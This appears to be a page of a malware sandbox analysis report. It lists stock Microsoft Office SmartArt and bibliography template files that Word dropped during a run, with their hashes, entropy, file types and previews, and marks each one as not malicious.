                                                                                                                                                        Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4888
                                                                                                                                                        Entropy (8bit):7.8636569313247335
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6448
                                                                                                                                                        Entropy (8bit):7.897260397307811
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                        MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5630
                                                                                                                                                        Entropy (8bit):7.87271654296772
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6193
                                                                                                                                                        Entropy (8bit):7.855499268199703
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3075
                                                                                                                                                        Entropy (8bit):7.716021191059687
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5151
                                                                                                                                                        Entropy (8bit):7.859615916913808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):333258
                                                                                                                                                        Entropy (8bit):4.654450340871081
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):296658
                                                                                                                                                        Entropy (8bit):5.000002997029767
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):268317
                                                                                                                                                        Entropy (8bit):5.05419861997223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):255948
                                                                                                                                                        Entropy (8bit):5.103631650117028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                        MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):251032
                                                                                                                                                        Entropy (8bit):5.102652100491927
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284415
                                                                                                                                                        Entropy (8bit):5.00549404077789
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                        MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
